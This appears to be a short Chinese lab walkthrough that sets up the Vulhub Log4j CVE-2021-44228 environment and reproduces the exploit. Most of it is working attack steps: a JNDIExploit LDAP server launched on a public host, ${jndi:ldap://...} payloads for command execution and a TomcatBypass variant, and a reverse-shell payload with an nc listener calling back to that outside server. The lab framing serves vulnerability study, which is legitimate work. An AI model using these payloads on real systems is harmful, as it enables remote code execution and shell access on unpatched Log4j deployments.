简介
Vulhub是一个基于docker
和docker-compose
的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
Github地址:https://github.com/vulhub/vulhub
1 2 3 4 5 6
| git clone https://github.com/vulhub/vulhub.git
cd vulhub/xxx
docker-compose up
|
漏洞环境
靶场:192.168.199.132
1 2
| cd vulhub/log4j/CVE-2021-44228/ docker-compose up
|
访问地址: http://192.168.199.132:8983/
漏洞复现
使用Jndi漏洞利用工具,在公网服务器开启ldap服务,监听11389端口
1 2
| java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 121.4.69.24 -l 11389 -p 18080
|
命令执行
1 2 3 4
| cmd:whoami ${jndi:ldap://121.4.69.24:11389/Basic/TomcatEcho} ${jndi:ldap://121.4.69.24:11389/TomcatBypass/TomcatEcho}
|
反弹shell
1 2 3
| nc -lvp 8888 ${jndi:ldap://121.4.69.24:11389/Basic/ReverseShell/121.4.69.24/18888}
|